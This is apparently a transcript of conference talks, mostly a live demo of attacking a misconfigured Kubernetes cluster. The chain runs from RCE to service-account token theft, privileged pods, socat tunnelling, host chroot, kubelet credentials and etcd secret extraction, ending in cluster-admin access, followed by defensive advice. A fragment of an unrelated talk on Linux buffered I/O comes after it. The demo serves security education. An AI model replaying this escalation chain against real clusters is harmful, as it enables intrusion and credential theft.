have to find it in my notes. Sorry about that. So, live demos, folks. It's the way you do it. So, I've got that. I'm gonna do, I've figured out what IP I'm at and I'm ignoring my slides because slides are boring. But I'm now going to cat something that is too long for me to type. So, copying. Copying from iPad. That's always fun. Paste it right into here. Come on, Apple. All right, look at that magic. What is that? That is a token. So, what I've done is I've gone to the default place for the service account token for a pod. That is the credential, if you will, that this pod can use to talk to that API server. Now, those of you who are Kubernetes savvy may know that that is in versions 123 or older defaulted to true to auto mount that in every pod that you start. Thankfully, Kubernetes has made that default to false starting in 124. This is a 123 cluster. In fact, if you run on most Kubernetes clusters, you're going to not be on 124. That's why I continue to show it right now. So, hopefully soon enough that, oh, I'm sorry, I'll grow that so you can see it. That's just EKS, just I pulled as an example. If you're starting up an EKS cluster, you're probably still on a 122 or earlier. So, many clusters you're going to see out there are still running an older version because 124, that's bleeding edge crazy. Who would run something that's brand new? Well, if you're not, and you're not explicitly marking auto mount service account token to false in your service account definition, you're going to have this thing available to basically every pod out there. Well, what can I do with that? Well, let me go back to our timeline. What do we know right now? So, we know we can hit this thing from port 80 from the outside. We know from the port information in those environmental variables that it looks like it's a service listening on 5,000. We know the IP address of the pod. And now we know that we have the pod token because it's available to us inside that pod. So now I'm going to take another string, copy it over here, do, do, do, do, do, copy. Come on, copy, going to replace. I'm gonna go back and overwrite this one. So what this is, is you can see in the larger text here at the top, what I've done is I've run curl. Now, curl's in my image, yay, I can use it, fun. So now that I have that, and now that because that's available to me, I can pass in the, into the authorization bearer that token that we found earlier. And I'm assuming the CA cert is right next to it because that's kind of the default place for it as well. And I hit that endpoint IP, and I'm going after the default namespace endpoints. And sure enough, I got a response. So, token's good, API endpoints good, and I can get at the default endpoints. Now why do I care about endpoints? Because it's often open. That's one that is good one to check. But another interesting thing here, if I scroll to the bottom, you see that IP address, that would be the publicly facing IP of the API server. So you see the port 6453 on that IP. Now, in this demo, it's not because I'm running inside of Docker desktop, which wraps things in another, all the layers that you have there with kind and everything. So I'm not gonna actually use that IP here, but if this was a Kube ADM started Kubernetes cluster in your development environment, say, you started up in a sandbox off of your B-Sphere, that very well would be available. Luckily, and I'll throw this in, most managed Kubernetes clusters do not expose it that way. So, managed Kubernetes clusters for the win. However, let's take what we've found here, and I'm kind of tired of using, or actually I should show my slides because we're moving along the timeline of DOOM. So we now know that the internal IP of the API server works and that the Todd token allows access to that endpoints API. So let's go back to what we had here. I'm kind of getting tired of using this RCE website because it's kind of cumbersome. I'd like to actually get at this server from a command line. So I'm gonna copy this whole token. I'm gonna come out here, and just like I said earlier, just to prove a point, I am not connected to a Docker engine at this point, and I do not, I have Kube CTL aliased. If I try to get something, I'm not connected to a Kubernetes cluster at this time. I do have in this directory a little setup script that will create a Kube config from a token, just because I'm too lazy to do one myself, and I'm gonna use the host name I know. This is why I would use that IP address if this was a regular Kubernetes cluster. Are we cutting off? Sorry. Better? Cool. So basically I just created a Kube config file. I'm going to export that into, oops. Ah. Is it, oh, is it off the bottom? Okay. Give me a second. Let's over scan. Come on, grab the corner. Are we there? Okay. Clear that. We're gonna export, oh gosh, my history is all screwed. There we go. It's gonna export my Kube config, and now if I try to get something, it is going to demo God's Please Work. Hey, that's actually a good sign. I'm getting an error from the server, so I am connecting to the Kubernetes cluster, and that token is actually working. It's just telling me that I'm not allowed. So it tried to pull pods in the default namespace, and it's saying you're forbidden. You can't do that. That's craziness. Why would we let you do that? But it exposed something to me that's interesting. If you look at this error, let me grow that font some. It says that user system service account secure web admin can't do this. The namespace secure is where that service, what that pod is running in. So let's try this. Get pod dash n slash secure. Don't confuse the word secure with meaning secure here. This is just the name of the namespace. Naming your namespace secure does not make it secure. So I was able to do a get pod on the secure namespace, and I got one. Let's see what else I can do. Let's do an auth. Can I, oops, can I dash dash list? We're gonna pass the token in. I think I still have it in my pitnip. Let me go copy that again. Copy, paste. So I'm gonna have to shrink that font just a little to make it fit better. So if you're familiar with can I, it's basically asking the API server what can I do? What can I using that token do? And that user in the default namespace, because I didn't provide one, is able to, let me shrink it a little more because it's so ugly. Endpoints, as we saw earlier, can do any of the verbs in the default namespace. But really there's very little I can do in the other resources with this. But if I use the same command and I pass in secure on it, namespace secure on it, you can see the very first resource is the wildcard with create, get, watch, list, patch, delete, delete, collection, and update. I can do a whole bunch in this namespace with that service account using that token. So that's handy. Let's see if, skipping through some notes here, we can, well let's go look at our, let's see what we know about this now. So we now know that there is a secure namespace and there's always a default namespace, so we have some namespace data we know about. And let's see if I can use this okay, get pod, and secure, so I can see the name of it again. Let's do an exec, IT in the secure namespace and I don't have my autocomplete configured, so just copy and paste and I want to run bash. Yay, I can do that. By default, I am the web admin user. That's good, at least I'm not rude. That's somebody who's listening to one of my talks. Let's see if I can sudo. No, sudo's not available, that's good. That's good, they at least didn't have that in there. Let's see where am I, I'm in this user src, let's see if I can make a file. I can, so I am in a read-write file system. Why does that matter? Well, let's go back to our little slides. Oh, I skipped one here, I was talking about the fact that our role, we have too many permissions, honestly, all of those permissions for this pod, this pod probably does not need all these permissions, especially if this is a business application, it probably doesn't need any of them. You don't need to be talking to the API controller if you're an e-commerce app, most likely. You probably don't even know where you're running in Kubernetes, so limit your permissions as appropriate. The read-write file system piece, though. What that means, the read-write root file system, when a Docker or a container D or a prior, whatever starts up a container, it layers a read-write file system at the top, on top of the read-only image. That's where all your mutation happens. So if you make a file, you create a file, you edit a file, it does a copy on write, brings the thing up there and makes the mutations at that read-write layer. If you pass Docker, for instance, dash dash read-only, or in Kubernetes, if you use a security context and set read-only file system to true, it just doesn't put that read-write layer there. This is not a silver bullet, but it does make it harder on a hacker to hide their tracks, customize your app configurations, delete logs, do things to modify that container. If I happen to be rooting that container and it's a read-write file system, I can very likely run app get inside that container and start installing other tools in the space of the container. Now you may have detection for that kind of a thing with intrusion detection systems or whatever, but it's better to head it off than react to it when it happens, in my opinion. So that being said, let's see if we can get our privileges extended. So this is just showing, we know we have a PS, oh, that's actually, I'm skipping ahead. Don't look at that slide. Let's see if we can do more. So I have a few manifests here. I'd like to try to apply. Let's get out of the exec and I'll show you one of them. We're going to do demo YAMLs, root pod YAMLs. This is a simple alpine image I wanna start up and I know that by default that alpine image runs as root. So I wanna see if I can get an image in there that'll get me root in a container on this cluster. So let's do apply F into the secure namespace. Oops, put the file after the F, Eric. Demo YAML, root pod. And it says it created it. Let's do a get pods on the secure namespace to see what's going on. Create container config error, hmm. Well, let's do a describe. Let's see what's going on here. Describe pod secure root pod. Error, container has run as non-root and image will run as root. So the cooblet, when it tried to start this container up, detected that the default user is UID0 and said, oh no, we don't allow that. Now, why did it say that? Well, we probably have a pod security policy or something in place to restrict that. And before anyone says pod security policies are going away, I know that, we'll talk about that in a minute. But you can see in the annotations, sure enough, we see a PSP resource called restricted has been annotated onto this pod. So we have a PSP and that was the giveaway here because we have a PSP in place. But let's see if, so I'm actually gonna kill, delete that root pod so we don't have it sitting around trying to start. I've got another one, of course. We'll look at demo yamls. Which one am I doing now? We're gonna do the non-root, prove. So this, a little bit bigger. This is, we have an image called sneaky that we're going to try to deploy that actually wants to start in the privileged context. I wanna be a privileged container. And I wanna do some nasty things with mounting of volumes here. So let's try applying that non-root, prove. Immediately got an error. This is a pod security policy. So we had good evidence, we had one before. This one tells you right here. Pod security, unable to admit pod privileged containers are not allowed. And that's by default, that's normal. That is, most places would restrict that. But let's try something else. I'm going to run another one. Demo URL or yamls, non-root, non-proof. This is the same thing without the privilege or the volume mounts. So same image. So we'll go ahead and apply into secure. It says it created it and it's running. So we have that running. Now, I am going to, I'm just gonna go ahead and exact into this. This is in secure, it's called sneaky. So there we are. We are inside the sneaky pod. And I'm going to, you know, say who am I? I am the user sneaky because again, non-root is set where can't run as root. But this is my image. I do have pseudo in there and now I'm root. So why was I allowed to do that? If privilege is disallowed, why can I do that? Well, that is because this isn't really actually that clear in the Kubernetes documentation surprisingly. If you set your security context to privileged false that does not make allow privileged escalation redundant. That is not defaulted to false. It allows it as you can see. So what we see here is we have a pod security policy that A has too many permissions. You shouldn't be allowed to be doing a lot of this stuff. And especially the fact that it doesn't have the restriction on allow privileged escalation. So that's the next step in our timeline of doom. So now we're root on a container in your cluster. Now we're in a container. So what can we do in a container? Let's say, go back over here. I would like to know what's the IP address I'm at right now. 10244162141. If we go back to our prior, just show that open. Now let me rerun IPA. So this is 10244162135. This is 144. So I know I'm in the same subnet. So I kind of get my bearings that I'm in the right place. But now I'd like to poke around. I want to see what's going on in here. So I'm gonna copy another command over here because I can't type this long one. Copy, clear my screen. Oops, that is not what I wanted to copy. Sorry guys. Copy, Apple. Okay, we're gonna start typing. We're gonna run Nmap. If you're not familiar with Nmap, this is a tool for scanning networks. And we know that our service is listening on 5,000. I'd like to know if there's any other copies of this app out there. Dash, dash, open in the 10 dots. What was that? I have to go back and look at my IP address. 244.162.10.244.162.0 slash 24. So we're poking around. Because I'm root, in a container, I can do this. That's one of the things you need elevated privileges to be able to do. And of course, this is gonna sit here and take forever. Come on. Oh, it did not find one. Oh, that's not good. That's not what I wanted in my demo. So I need, I don't have to provide the full. Hold on a second. Do, do, do, do, do, do. What did I do wrong? Sorry, maybe I have to give it my IP. That would be weird. 162.14. I'm also not a network engineer. So what I am expecting this to return to me is that we find another one. We find another IP address listening on port 5000. And because we've been looking around in this network, we know that only one pod is running in the secure namespace, that means it's somewhere else. And why is this not working? I'm sorry? There are, right, but one of them is the sneaky pod. Right, but what I'm looking for, let me copy this whole IP. Maybe I'm just doing this wrong. I've slept since I've gotten this far in my demo. What I'm looking for is another of the exploited, or exploitable applications running in another namespace, is what I'm hoping to find. And normally, oh sure enough, there it is. Oh gosh, see, I'm blind. You get blind on stage, folks. Sorry about that. So yes, so 135 is the original one, and that's the one we see here. Thank you. 136, I'm gonna bring you up here and hand over the keyboard. 136 is something else. Somebody else is running at 136, and I'd like to find out who that is and what's going on there. So in order to do that, in this exact, I am gonna run Socat. And I'm gonna, Socat, socket cat, it's like a tunneling tool, if you will. It's more than that, but that's what I'm gonna use it for. We're gonna do a Socat, and we're going to get lost in my own notes. I scrolled it off my screen. We wanna do a TCP listen. We're gonna listen on 5001, which is an open port. Use ADDR, fork, and we wanna send traffic to 10.244.162.136 on port 5000. So we've got Socat listener going right now, right there. And now what we need to do on our local console, I'm gonna open another tab and get out of Fish, because Fish doesn't like me today. Am I in the right directory? I'm gonna go to Work, Get, and I am going to do a, so it happens when you have too many laptops. So we wanna do a K port forward into the sneaky, oh wait, hold on, export, there we go. K port forward into sneaky pod at port 5001 on the secure namespace. So if you're not familiar with that command, Kube CTL has now reached out to the sneaky pod, because we have that token, we can get to it, then we're the same token that we exacted with, and we have opened a tunnel up from my local host where Kube CTL is running on 5001 through traffic hitting local host at 5001, we'll hit sneaky pod at 5001, where we in turn have a Socat tunnel listening at 5001, pointing at whatever that thing is on 5000. So I'm gonna go back to my browser, open a new tab, we'll hit local host 5001. Same app, surprise, surprise. Some developer apparently is running another copy of the app elsewhere in the cluster. So we're gonna do the same kind of thing here, and I'm going to, actually I just copied from over here, run the same, let's copy this whole thing, front end of that, there's the token from wherever that's running. So let's go back now to our command line, and open another tab, actually I don't need an open another tab, I'll just, I don't need my port forward after that. Let's get out of there, and we're just gonna edit this Kube config file. Oops, where am I? BI, demo, Kube config, oh it's just not visible, there we go, and I'm gonna comment that out, paste that in, is that indented right? I think so, and now I'm able to get pods in default, because that guy is running in default, because this is a development cluster maybe, this is some place where he has access, or she has access to deploy into the default namespace, that I think you can see where we're going. So, what have we found? No network controls are in place. So end map, besides the fact that I was able to get in as root, and run end map, I could have installed it if I needed to probably. I obviously don't have any network policies in place, or other firewalling that's keeping me from perusing around outside of my namespace, or places I shouldn't go, and this technically could be somewhere else, but it's nice that it was in the default namespace for me. We found a pod listening on 5,000 somewhere, and then determined that it's in the default namespace by going and getting its token using that now, and we were able to access pods in the default namespace. So now, I'd like to see if I can get a privileged pod into the default namespace. So we'll come back to the command line, and let's go back over here, and I'm just gonna go ahead and get out, we don't need that SoCAD anymore, or anything, so I'm gonna get out of there, and I'm going to do a K apply into the demo. K apply into the demo, yamls, why, oh, I'm not out of the pod, sorry. K apply into the demo, yamls, and we're gonna go back to that non-root privileged manifest I showed you earlier, but we're gonna deploy it to default, and sure enough, that worked. That's because the namespace wasn't restricted by the pod security policy that was in place, and this is more common than you may think, because developers writing an application for their namespace often will craft their pod security policy or other restrictions for that namespace, deploy it to that namespace, and if your cluster ops aren't restricting defaults, default won't be restricted, and sure enough, somebody decided to start the app in default, and I was able to get in there through all the things we've said, and now I've got a pod running in default, so let's go ahead and exec into that, and do-do-do-do, go into non-root-proof, oops, not boss, bash, there we go, and I am able to become root, and if you remember from that manifest, we were mounting the root file system from the host, and we put it into, well, there's more in there, I thought it was, there's a lot of stuff in there. We have a volume that's slash charoot that it's mounted to, handling name, because if I do a, let's do this, let me do a PSX to kind of make this more dynamic. If I do a PS right now, I'm in the process name space for this container, so all I'm seeing of the process is running in this container. That goTTY, there's another piece of the demo I could be showing, or I could get a web TTY, but that was too fancy for me, but if I now do a charoot, which changes the root, change root, of the current shell to whatever I'm going to tell it, I'm gonna change it to the volume named charoot, or the directory, and if I do that same PSX again, there's all the PIDs on the host, because the way PS works is it looks at the proc file system for that kind of stuff, and the proc file system in this container, effectively for this shell, is the one that's on the host. I now have basically host access on this worker node. So that's bad enough, but what can we do more? So let's come back and see what we've got. So we have no restriction to the default name space in the PSP, that's obviously bad. We now, we wanna get at, what do we wanna get at? We only get at CD, right? If you're in a Kubernetes cluster, you wanna get to CD because that's the keeper of all things, and that's over on the kubesystem namespace, and we're not there yet, but we do have a privileged container over here in the default namespace. So let's see what we can do to continue to expand this exploit. So right now I am going to, so what I wanna do is from this pod, I wanna try to connect to kubesystem. I wanna get at something in kubesystem. In order to do that, I know my sneaky pod has kubectl installed in and I have the tool, but I need a key that can get me a token that can get me over there, and the default token's not gonna do it, but what is on every node that might have it, especially if you have root access to the host volume, I'm not gonna CD to it, but I'm going to export kubectl config to etsy, kubernetes, kubelet.conf. That's the default place kubedman, or most people will install the token that kubelet uses to deploy to do its things, to talk to the API server. So now if I do a kubectl, get pods in the kubesystem namespace, I can see them. Ooh, fact kubectl, get nodes, yay, I can do that. So, I already showed you the slide that we now have, well, I've showed you the privilege, I don't wanna show that again. I need to see something here though, let's do kubectl describe pod in the kubesystem namespace I wanna take a look at that etsy kind control plane. Is that right? Yes, that's right. What I'm looking for here is where on the control plane host, PKI, the tokens for etsy dr, and etsy d certs volume is the standard place, but I know where it is, and also should show me it's on node kind control plane. So that's interesting. So let's see if, I'm gonna come back out here to my other shell, I'm back out on my laptop now, and I'd like to try to apply with the token I have, oh wait, I'm sorry, skipping my notes around. One moment, oh yeah, sorry. Okay, so if I try then back in my sneaky pod, if I try to do a kubectl run, I'm gonna try to start up a pod, and just try to start a busy box. Midge equal busy box, restart equal never, dash dash shell. Forbidden, I knew that was gonna happen, that's the first thing I would try, but I can't do that because the kubelet, ironically enough, cannot start pods, it can start containers, but it's actually restricted by default from creating them. Now, I could go edit etsy kubectl runes manifest and add a static pod to that, a shadow pod, mirror pod, sorry, and start one that way, that's no fun, I don't wanna mess with that, so what I'm gonna do is let's do this. I'm going to, I've got another, obviously, I have tons of YAML, I'm going to run another one that is an etsyd client, and you can see that this is going to start the Kubernetes etsyd image, it's going to set a bunch of things, now I've already filled this in with the info we saw there, it's going to try to connect to the etsyd endpoint and get access to things, so let's do 10 minutes, oh, I am hitting my time, okay, kexec, not exec, sorry, kapply, see now you got me all flustered, you're showing me the time, fdemo URLs, YAMLs, etsyd clients, so we're gonna start up this etsyd client in the defaults and we're gonna get in there with etsyd clients, thank you, this is why paired programming works, and I'm just gonna type this because I know where it is, local bin etsyd, cli, member list, oops, maybe I don't know where it is, exec etsyd, what did I type wrong? user local bin etsyd, CTL, okay, so we did get a good connection, so we know that we actually, even though it didn't like this, it gave this warning, we did get a connection, so now I'm going to modify that to, instead of doing a member list, I'm going to get dash dash keys only from key grep, what do we want, we want secrets of course, so we always want out of etsyd, and there's the list of the names of all the secrets, yeah, well the one I care about is, let's see, where is it? Cluster role aggregation controller token, what can I do with that? Let's copy this line, copy, edit this, edit this, I'm going to do an etsyd get on that, right, right, right, there's a token, let's see what I can get with this, and grab from there to there, and we'll do a k off can I dash dash list, I'm running out of time, so I'm just going to hit the, get to the end of this quick, you must be logged into the server, hmm. You know what's probably happened is something has been upgraded behind my back, and it's no longer vulnerable, hmm, come on demo, do your thing, there it is, it just didn't like the annotation at the end, so what we can see here is cluster roles, are back authorization kates.io, escalate, get list patch update watch, and that Greek means you are God on this cluster with that token, so if we go back to our notes, we were able to get over there, cluster rights gains, and that is the end of your server as far as you know, so how could we have prevented this, I talked all throughout some of the things you could do to this, but the first thing is scan your application code, don't let RCEs get into your, do your best to not let RCEs get in there, and honestly that contrived Flask app, if I throw that through a Python static analysis scanner, I know ours catches it, but they should catch that and sure enough ours does, it'll say high vulnerability here, you're running a command from unparsed input, don't do that, scan your container images for the same reason, scan your Kubernetes YAML for best practice, there's tons of scanners out there, use them, don't trust your default, speak explicit about things, specify your pod security policies, or admission control, whatever, to not allow permission, a privilege escalation, use network policies, they are your friend, I know as a developer when a lot of us think network firewall rules, it seems complicated, I have to open tickets for that, network policies is really not that complicated, doing it right takes work, but you wanna make sure you're using that tool that's available to you, and use admission control, so I mentioned PSP as being deprecated, it's gonna be removed in the next release, it's been deprecated since 121, I believe, and pod security admission is coming along, but your admission controllers that are popular out there today, your OPA gatekeeper, your Kyvurno, you can do a lot of the same things with those tools, and they're very popular, there's a ton of support out there for it, so use some kind of admission control to enforce what you would normally do with PSP, as well as a lot of these other things, don't let people deploy to the default namespace, just don't. Finally, I just wanna give thanks to a bunch of people, I've only listed a few here, but everybody in the SIG Security, Mark Manning, Ian Coldware, Duffy Cooley, Chris Nova, all these people out there, a lot of what I've learned here, what we've presented to you, I've learned from listening to these people. So SIG Security, Tag Security, OpenSSF, all these groups are there to help us learn security and implement it well, so I just wanna thank them all and tell you to join our SIGs, hang out with us, and now, with the time I have left, I'm open for any questions you might throw at me, I'm gonna take a drink. Yeah, awesome, please raise your hand if you have any questions, and I will come over with the microphone and hold it for you to avoid contact. All right, let's start with you over here. Thanks for the great talk, that was awesome. Can you give us any examples of like a safe default configuration though we can just set up a, I know it's a silly question, but just something for a complete security dummy, like use this on your cube cluster and at least you're not gonna be stupid. Without pitching for anybody or any single project, there's a lot of cube scanners to scan your clusters to tell you whether or not your cluster itself is meeting CIS standards or other standards, cube benches, one of them. In fact, if you're doing the CK, take the CKS, get your CKS cert, you will learn a lot about these kinds of things, but there's a lot of tools out there that to implement these from many vendors, particularly sneak actually, we don't do runtime stuff, so I'm not, I'm gonna pitch us, I'm gonna say look at the open source projects that are out there. If you are on a managed Kubernetes from a distribution, often they will bake these things in, because that's why you're paying them. So, EKS, GKS, many of these things that I did aren't as easy to do there because they've already set some, you would have to undo some of the things they're doing to attack them, so I would say pay attention to the vendor you're using for your Kubernetes, don't be undoing things, so if for instance, the service account token auto mount that is going live in 124, when 124 gets rolled out, if your apps all break because they're trying to talk to the API cluster, question why talk to your developers, why do you need to talk, why do you even know you're on Kubernetes? Are you doing a monitoring tool? Okay, let's talk, are you doing a business application? WTF, why are you even aware that you're in a container, so that kind of stuff, does that help? Anyone else? Well cool, we'll all be around afterwards, we get a break after this, so I'll be hanging out, if you have any questions, like I said, join us in security, tag security, open SSF, supply chain security, all those things I hang out. Yeah, I promise to Kubernetes community is super friendly, super welcoming, thank you so much Eric. We will be back here in half an hour after the afternoon break, I believe that is 3.30 for our next talk, and I just, I'm going to peak, oh yeah, exploring memory usage and IO performance, so hope to see you back, please enjoy the rest of the conference, I know that we have a tradition of chatting after a talk, so please feel free to come up and hang out. Thanks Eric. Testing mic is off. It was the best meetup that I have ever been to, why? Two reasons, first of all, it was the first time that I realized how much I love DevOps, and the second reason is was that it was the first time that I ever said out loud that I believe that every developer should practice DevOps, and now after that I said it, now we can really start talking, so hi, my name is Noah Barkey, I am developer advocate and full stock developer for about seven years. I am also a tech writer, one of the leaders of GitHub, Israel community, which is the largest GitHub community in the whole universe, and I work at an amazing company called The Tree, where we help developers and DevOps engineers to prevent communities mis-configurations from ever reaching production. Now, why am I telling you all of this is because before we launched The Tree, we wanted to learn as much as possible about the common mis-configurations and the pitfalls. Yep, works. Good afternoon, scale. Welcome back to the cloud-native track. It is, these are the final few sessions for the Friday, for today, which is, I think, Friday, and if it is, in fact, Friday, it is my deep pleasure to introduce Fritz Holhland, here from the Netherlands, to talk to us about basically, and this is I actually, you see it on the screen, memory usage and file.io, and yeah, and I think there will be actually exciting demos here he already mentioned, so I'm going to be very excited. Please, please be kind during the demonstrations, and I look forward to your talk. Thank you. Thank you. Thank you all for joining me. My name is Fritz Holhland. As you could hear by my pronunciation, I'm from the Netherlands, so like you said, please bear with me, English is not my first language. I work for a company called Yugabyte, and Yugabyte is a distributed database, which is a very interesting technology and actually has a great match with the cloud and with stuff like Kubernetes, because we created it from the ground up to use it. And one of the things that I have been looking into and have been talking to with a lot of clients in my role as developer advocate is on how to configure things. And that is what this talk is about, is about Linux and disk.io and disk.io performance with relation to memory. And that is actually really interesting. And if you look at Postgres, Postgres uses I.O. in a way that memory of Linux is really important. So I think this is a talk which is really good for Postgres people to look into too. And oh my God, what is it? If you look at cloud native applications, so meaning running in the cloud, what you typically see is that running in the cloud you try to use as small machines as possible. And with as small machines as possible, it's the lowest amount of CPUs because that's cheaper, but it's automatically also means you have lesser memory, which is really interesting because these machines have with it a limit on the amount of I.O. they can perform. And that is a really interesting topic which I think has a really important relation to this presentation, which is on one hand a bit philosophical, but on the other hand is really important to understand. Think about this. When I started doing database technologies, we disks were all the thing you absolutely had to look at and understand that the disk rotates at a certain speed. And because of this rotational speed, it meant it could give you data at a certain rate. So disks, the rotating disks were absolutely a bottleneck. And if you think about where this is going with cloud, please bear with me because I think this is really important to understand if you want to understand and learn about disk I.O. performance and cloud. So we have this rotating disk and they have a certain limit in how much bandwidth and I.O.s per second they can give you. Luckily, in the 90s came rate set. And with rate sets, you could use multiple disks as one logical disk, which meant that you could use more bandwidth. The latency didn't go lower, but you could use more bandwidth of the disks. When that started to happen, at the same time network attached storage and storage area networks came into place. And with these, you had specialized appliances running I.O. for you, which meant that they could produce even bigger amount of I.O.s because they could host more disks than your server probably would have been able to host and the especially SENS and NSS too would have had caches, which meant that they could actually lower latency. That was all great. And then came SSDs. And SSDs were fantastic because SSDs were disks which were sitting with didn't have any rotating things, which could sit in your own server and in your server, they could provide you really low latency. Then came NVMe access to the disks, which meant that you could use a lot of more bandwidth, which was essentially limited to the system bus on your computer. So you had huge bandwidth and very low latency. And then came Cloud. And with Cloud, if you take such a small machine, and as I talked about earlier, that machine is automatically bound to a certain amount of I.O.s and a certain amount of bandwidth that you can use. And with that, if you look at the bandwidth and the amount of I.O.s per second that you can do in a virtual machine, it's essentially, I see the same limits as with a disk which I first saw in the 1990s. That's mind-blowing and weird. What does this have to do with this presentation? Well, first of all, it's important to realize that disk is actually, again, a bottleneck, especially if you use smaller cloud VMs and using smaller cloud VMs is what you probably want to do in the cloud to reduce cost. So now, going back, if you're doing I.O., probably the I.O. you're doing is buffered. And buffered means that if you're performing an I.O., the stuff you obtain is stored in the memory of your Linux server. And if you request it again, it comes from memory. There is another option, which is called direct I.O., which can be set using a specific flag. That is possible. That will completely bypass the cache. And that has advantages, that you don't store this data in two places because if you want to get it in user space, in your application or for your database, in your database cache, then it doesn't make sense to also store it in the operating system. A lot of databases use direct I.O., but Postgres doesn't use it. And Postgres even explicitly in still today, I'm not sure if that's going to change, asks you to set a reasonably small amount for its own cache and use the operating system caching. Now, if you're confused, if you have nothing to do with a database, but just want to understand how your application can use I.O., then, and you're not sure whether you're using direct I.O. or not, probably you're using buffered I.O. You can use LSOF as a utility to just see how your open flags are, but probably you're using buffered I.O. So, where does buffered I.O. go? Well, somewhere on your Linux system, obviously. Linux does not have a true dedicated cache for these blocks. Traditional Unixes like IBM AEX and HPUX did have a dedicated cache. So a shielded area where this would go. Linux doesn't have that. And there is another interesting topic. If you're doing buffered I.O., which is probably most of all of your I.O., then it must be stored as a cached block in your server. Even if you're completely running low on memory, it must be stored as a cached block at one point. Even if it is flushed immediately, writes are different. Writes are special and I will get to that. The important part is, and because I've done Oracle for a long time and Oracle, you should set direct I.O. for Oracle. When I started looking into buffered memory, then I realized that if you're doing buffered memory, it competes equally with applications just trying to take memory for the purpose of growing their heap for performing their work. They compete evenly, which is really interesting to think about. And I know numerous cases where people, in this case, again, Oracle, but I've done Oracle for 25 years. So I have a lot of experience and references to that. I know a lot of people doing Oracle where they very carefully crafted all their memory areas. Very carefully because databases are really sensitive to memory and especially shortage of memory. And they would work and then all of a sudden, they would find that their system had swapped, which they totally didn't expect. And I, for a lot of times, didn't understand it, but it wasn't a problem because the system wasn't actually swapping but swap was taken. And now when I investigated buffered I.O. In hindsight, I realized what happened. The backup is done and the backup is probably done buffered, which means it competes with normal applications and therefore it would push out certain pages which haven't really low touch count. The Linux buffer cache keeps a touch count of all the buffers and it will push out the one with the lowest touch count if you're running low on memory and push these to swap. But if that is a bootstrap, a page which contains your executable code which is only used for starting up your application, this page will never be used again. So it's not a problem. So that is another point. If you're swapping out and you're not actively swapping in and out and you have swapped out some stuff, it's not a problem. And I've seen a lot of tickets which people try to lower back their swap because that was what's supposed to be how it should be. Don't, that's not necessary. Okay, so where does Buffered I.O. go? So I haven't said anything about it. Well, Linux provides an insight into how memory is divided in Proc Mem Info and messy sounds a bit negative on the slides. I say it's a messy gathering of statistics but it's actually just a whole bunch of statistics and some of the statistics have figures in it which are also doubled by other statistics and some statistics aren't kilobytes but are pages. For example, for the large pages. But very roughly, if you look at the statistics for cache dirty and mapped, these are roughly what is that. What is the cache of these blocks? That's not really precise, what I'm saying. I know. What I'm trying to say is it probably is not useful and handy to try to exactly figure out how much of these pages you're caching. It fluctuates, also it fluctuates all the time. But you have to have memory available for Buffered usage and actually the best indicator which is very much non-set. I cannot find a lot of reference to this but the best way to assess if you have enough memory is the statistic Mem available. It's a, I've forgotten the exact Linux version but it's Mem available is not a really ancient statistic but Mem available is what is actually potentially available at that point in time that you are querying Proc Mem info. One of the things that I get asked quite frequently is what about Mem free? Well, Mem free is not free as in available. Mem free is actually a small amount of data which Linux tries to keep free for the purpose of very quickly handing out freed memory. Linux, and this is a really important rule, probably like most operating system tries to do as little as possible. So if you're dirtying, if you push in data it will just be there. It will not be freed only for a bare minimum which is Mem free. So it has nothing to do with memory being available. It's a tiny part of memory which is explicitly made free for the sake of providing memory pages to a Linux process which requires free memory. Of course, just after startup there is a lot of free memory because you haven't touched all this memory so it's by definition actually free. But like I said, if you start doing stuff it will just put stuff in all these buffers and it will not do anything with it unless it absolutely has to. If you actually need to make memory free you're using the swapper and at Ugabyte we use virtual machines with no swap allocated which I had a hard feeling about it but actually it works rather well. And what you sometimes see on a system with no swap allocated is that the swapper threat of the Linux kernel gets active which is really weird because we don't have any swap. Well, the swapper is actually not really good naming in the Linux, in Linux. The swapper is actually the page demon and it's the swapper who frees memory if a process actually needs it. So, and I've got a link. This presentation will be made available. I've got a link who tells a lot more about it. So, mem free. It's the kernel estimation of memory that is available without requiring swapping immediately. So why would this be important? Well, buffering IO can do miracles for performance and equally it can do miracles for application which require to do IO. And let's test this. Let's actually just see how this works and I provide really simple comment lines. Test it for yourself. If you're having doubts, do the actual good thing and test it for yourself because everyone uses memory and IO in a different way. I'm doing it on an Amazon EC2 machine which is of the shape a C5 large and I've got these weird numbers here. Oh, you don't see my pointer. I've got these numbers there which says C5 large VM, 20,000, 4,000 IOPS. The first number is the bursting number and the second number is the base number and that's also for the megabytes per second. How does that work? If you have a small machine, then in a lot of cases you're allowed to run with bigger limits for a small amount of time and that is specified in the documentation how much it will reduce it which is called bursting. If you're using a virtual machine professionally, you should not use bursting. It can absolutely drive you nuts if you're doing something at a good rate and then for reasons unknown because the Amazon platform reduces this so you can't see it. Linux doesn't give any indication. It just magically gets lower. If you're bursting limits, you're bursting credits I should say. Amazon, it works based on the credit system, goes lower. Do not use it because it is impossible to understand without looking at the Amazon side and understanding that you've gone through your credits and the same applies to the, what I call EBS, elastic block storage. There the limits are, these have limits too. So you have to combine these limits and obviously the lowest of the two is what is applied. In my tests, I'm not running into my bursting limits so then the lowest to apply so I can do 3,000 IOs per second and 125 megabytes per second. These are my actually limits. There is a page, if you know, even if you know what you're looking for, it's, I think it's hard to find that page but it's really important to understand the limits so you can use this link to see your EC2 limits especially if you see weird things and now when I say this, you think, hey, maybe that's it. So I have a C5 large, it's a four gig machine and what I'm going to do is I'm going to use FIO and I'm reading two gigabytes in this way. The switches are all there. A word about FIO, FIO is a brilliant tool. You can do anything with FIO but in its brilliance, it has so many options and so many options have been totally thought through that it sometimes is really strict in what it's doing which means that it might not actually be doing what you think it's doing and one of the things for which this is true is I have a switch which you might not have seen a lot which is a dash dash invalidate zero. Dash dash invalidate zero means to not wipe the cache before running it because I want to run it two times and I want to show the advantages of using the cache so it would not be helpful if FIO would wipe the cache for the second one because then I would be doing exactly the same, right? If you're doing things with FIO, validate, cross check that FIO actually does what you think it is doing. It's really important to do that. I find that I want to look into specific behavior. It might not do what I am thinking it is doing. So this is how it looks like and I hope it's a video so I hope it's big enough and I, yeah, it is doing stuff. This is a utility and I'm afraid that I cannot enlarge it because it's a video so this is, I wrote a small utility in Rust to show the memory sizes and I will show the end output in a bigger font later on so essentially I'm running stuff so I'm looking into this and then I'm pasting FIO and by pasting FIO it will start reading data and then it produces the output and this is the highlight. I'm doing a 2,609 IOs per second which is 21 megabytes per second. My limits are higher so why can I not reach the limits here? Is Amazon lying about its limits? No, it's the latency. The latency is really good. It's 0.3 milliseconds per IO but still I need to 